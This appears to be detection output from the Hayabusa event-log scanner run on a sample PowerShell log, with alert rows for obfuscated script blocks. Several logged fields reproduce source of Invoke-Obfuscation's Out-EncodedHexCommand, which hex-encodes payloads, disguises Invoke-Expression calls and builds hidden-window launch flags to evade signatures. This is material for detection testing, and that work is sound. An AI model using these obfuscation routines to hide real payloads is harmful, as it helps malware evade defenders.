{$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Hex values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script w",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedHexCommand { <# .SYNOPSIS Generates hexadecimal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedHexCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedHexCommand encodes an input PowerShell scriptblock or path as a hexadecimal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInt -NoPr ""('57_72}69R74u65P2dR48T6fu73_74;20_27R48T65R6cR6c;6fT20;57}6fP72}6cT64u21;27}20}2dP46T6f}72u65{67T72}6f_75}6e{64P43_6f_6cR6f{72u20;47T72{65T65}6eT3b}20T57_72P69u74u65P2dT48T6fR73;74;20P27T4fu62;66P75{73R63}61}74{69R6fu6eT20T52u6fT63u6b;73u21;27}20;2d;46R6fT72T65P67P72R6fP75{6e}64T43_6fP6cR6f{72;20T47T72T65{65}6e'-SPLiT'P'-SpliT'}'-SPLIt 'u'-SpLIt'{'-SPLit'R' -SplIT '_'-SpliT'T' -SplIt';'| ForEach-Object { ([Convert]::ToInt16(( $_.ToString()),16)-AS[Char]) }) -Join ''|Invoke-Expression"" C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join (( 57,72 , 69 , 74 , 65, '2d', 48, '6f', 73 ,74, 20, 27 ,48, 65, '6c', '6c','6f', 20,57 , '6f',72,'6c' , 64 ,21 , 27 , 20 ,'2d', 46,'6f', 72 ,65 ,67, 72, '6f', 75 ,'6e', 64 ,43,'6f' , '6c' ,'6f' , 72,20 ,47 , 72 , 65, 65,'6e','3b', 20, 57 ,72,69 ,74 ,65,'2d',48 ,'6f' ,73, 74 ,20 , 27,'4f' ,62, 66,75 , 73 ,63 ,61 ,74 , 69 , '6f' , '6e', 20,52 , '6f',63 , '6b' , 73,21,27 , 20, '2d' ,46 ,'6f', 72,65 ,67, 72 ,'6f' ,75 ,'6e' , 64 , 43,'6f' ,'6c' , '6f' , 72 ,20, 47,72,65 , 65, '6e') |ForEach-Object{ ([Char]([Convert]::ToInt16( ([String]$_) ,16))) })|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 16 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters g-z with random case to $RandomDelimiters (avoiding a-f as it will be used for Hexadecimal values). @('g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Hex values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script w",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ithout dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) 